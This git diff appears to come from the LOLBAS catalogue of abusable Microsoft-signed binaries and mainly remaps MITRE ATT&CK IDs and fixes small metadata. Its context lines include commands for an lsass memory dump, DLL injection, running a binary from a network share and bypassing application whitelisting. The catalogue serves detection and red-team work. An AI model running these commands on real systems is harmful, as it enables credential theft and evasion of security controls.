diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index 1827ef8..d2a0684 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 Full_Path: - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index caeb515..0316d71 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -9,7 +9,7 @@ Commands: Usecase: Defense evasion Category: ADS Privileges: Admin - MitreID: T1562 + MitreID: T1562.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\fltMC.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 9047c45..ece23f5 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -9,37 +9,35 @@ Commands: Usecase: Compile and run code Category: AWL bypass Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe @sample.rsp - Description: Executes Logger statements from rsp file + Description: Executes Logger statements from rsp file Usecase: Execute DLL Category: Execute Privileges: User - MitreID: T1127 - MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger dll file with TargetLogger export Usecase: Execute DLL Category: Execute Privileges: User - MitreID: T1127 - MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 9b6e9b5..a1b6052 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -9,14 +9,14 @@ Commands: Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 2004 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 1909 Full_Path: - Path: C:\Windows\System32\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d70dd3e..22c7cd1 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -9,7 +9,7 @@ Commands: Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 1809 and newer - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 1857b55..8005637 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -2,7 +2,7 @@ Name: adplus.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x -Created: 1/9/2021 +Created: 2021-09-01 Commands: - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet Description: Creates a memory dump of the lsass process diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index cbf4b4c..e9ff890 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of assembly shellcode. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: | cdb.exe -pd -pn @@ -18,7 +18,7 @@ Commands: Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 07488e9..173d3bf 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of unsigned C# code. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 232e362..5b3e217 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -9,14 +9,14 @@ Commands: Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 7e5e4e6..b6fed3b 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of C# project stored in consoleapp folder. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: N/A diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index a9b5b5e..85075e9 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of a process as a subprocess of Dxcap.exe Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Windows\System32\dxcap.exe diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 7fc4a83..c2e3188 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -9,14 +9,14 @@ Commands: Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index 51ac531..96311e5 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -1,6 +1,6 @@ --- Name: ntdsutil.exe -Description: Command line utility used to export Actove Directory. +Description: Command line utility used to export Active Directory. Author: 'Tony Lambert' Created: 2020-01-10 Commands: diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 6386ef2..727a311 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -9,14 +9,14 @@ Commands: Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 056b8ab..8c5e1d7 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -9,21 +9,21 @@ Commands: Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 50da850..ad99835 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 05c8b00..40ad775 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -9,14 +9,14 @@ Commands: Usecase: Injection of locally stored DLL file into target process. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index 417bc49..5177e12 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 279f83d..efe48fb 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe